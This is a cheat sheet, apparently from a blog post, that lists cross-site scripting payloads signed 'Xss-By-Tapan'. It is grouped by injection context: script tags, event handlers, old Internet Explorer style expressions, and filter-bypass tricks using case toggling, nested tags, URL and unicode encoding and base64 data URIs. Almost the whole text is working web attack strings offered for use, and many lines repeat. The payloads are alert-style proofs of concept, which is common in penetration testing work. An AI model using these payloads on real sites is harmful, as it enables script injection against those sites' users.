Basic Cross Site Scripting(XSS) Payloads:
<script>alert(“Xss-By-Tapan”)</script>
“><script>alert(“Xss-By-Tapan”)</script>
“><script>alert(/Xss-By-Tapan/)</script>
“><script>alert(“Xss-By-Tapan”)</script>
“><script>alert(/Xss-By-Tapan/)</script>
Inside Script Tag:
</script><script>alert(“Xss-By-Tapan”)</script>
“);alert(“Xss-By-Tapan”);//
“);alert(“Xss-By-Tapan”);//
Bypassing Tag Restriction With Toggle Case:
“><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Tapan/)>
“><ScRiPt>alert(“Xss-By-Tapan”)</sCrIpT>
“><ScRiPt>alert(“Xss-By-Tapan”)</sCrIpT>
XSS Using Image & HTML tags:
Works Only On Chrome
“><detials ontoggle=confirm(0)>
“><IMG SRC=x onerror=javascript:alert("Xss-By-Tapan")>
“><img onmouseover=alert(“Xss-By-Tapan”)>
“><test onclick=alert(/Xss-By-Tapan/)>Click Me</test>
“><a href=javascript:alert(/Xss-By-Tapan/)Click Me</a>
“><h1 onmouseover=alert(“Xss-By-Tapan”)>Hover Me</h1>
“><svg/onload=prompt(“Xss-By-Tapan”)>
“><body/onload=alert(“Xss-By-Tapan”)>
“><detials ontoggle=confirm(0)>
“><IMG SRC=x onerror=javascript:alert("Xss-By-Tapan")>
“><img onmouseover=alert(“Xss-By-Tapan”)>
“><test onclick=alert(/Xss-By-Tapan/)>Click Me</test>
“><a href=javascript:alert(/Xss-By-Tapan/)Click Me</a>
“><h1 onmouseover=alert(“Xss-By-Tapan”)>Hover Me</h1>
“><svg/onload=prompt(“Xss-By-Tapan”)>
“><body/onload=alert(“Xss-By-Tapan”)>
STYLE CONTEXT:
Only Works On Older Versions of Internet Explorer, IE7, IE8
If Input Is Inside <Style> Tag:
body{xss:expression(alert(“Xss-By-Tapan”))}
If Input Is In Style=” ” Attribute:
xss:expression(alert(/Xss-By-Tapan/)
Bypass Script Tag Filtering:
<<SCRIPT>alert(“Xss-By-Tapan”);//<</SCRIPT>
%253script%253ealert(/Xss-By-Tapan/)%253c/script%253e
“><s”%2b”cript>alert(/Xss-By-Tapan/)</script>
foo<script>alert(/Xss-By-Tapan/)</script>
<scr<script>ipt>alert(/Xss-By-Tapan/)</scr</script>ipt>
%253script%253ealert(/Xss-By-Tapan/)%253c/script%253e
“><s”%2b”cript>alert(/Xss-By-Tapan/)</script>
foo<script>alert(/Xss-By-Tapan/)</script>
<scr<script>ipt>alert(/Xss-By-Tapan/)</scr</script>ipt>
Advance Payloads:
Hex Encoding
“><IMG SRC=x onerror=javascript:alert('XSS')>
“><a XSS-test href=jAvAsCrIpT:prompt(/Xss-By-Tapan/)>ClickMe
“><h1/onclick=a\u006cer\u0074(/Xss-By-Tapan/)>Click Me</h1>
“><a id=”a”href=javascript:a\u006cer\u0074(/Xss-By-Muhaddi/) id=”xss-test”>Click me</a>#a <
<a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe
“><IMG SRC=x onerror=javascript:alert('XSS')>
“><a XSS-test href=jAvAsCrIpT:prompt(/Xss-By-Tapan/)>ClickMe
“><h1/onclick=a\u006cer\u0074(/Xss-By-Tapan/)>Click Me</h1>
“><a id=”a”href=javascript:a\u006cer\u0074(/Xss-By-Muhaddi/) id=”xss-test”>Click me</a>#a <
<a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe
Some Alternative Useful Keywords:
Alert = a\u006cer\u0074
Prompt = p\u0072om\u0070\u0074
Confirm = co\u006efir\u006d
Javascript = jAvascript
: = :
( = (
) = )
Using alert(/Xss/) in a link = alert%28 /Xss/%29 example: <a href=”javascript:alert%28 /Xss/%29″>Click Me
Base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
Prompt = p\u0072om\u0070\u0074
Confirm = co\u006efir\u006d
Javascript = jAvascript
: = :
( = (
) = )
Using alert(/Xss/) in a link = alert%28 /Xss/%29 example: <a href=”javascript:alert%28 /Xss/%29″>Click Me
Base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
Post a Comment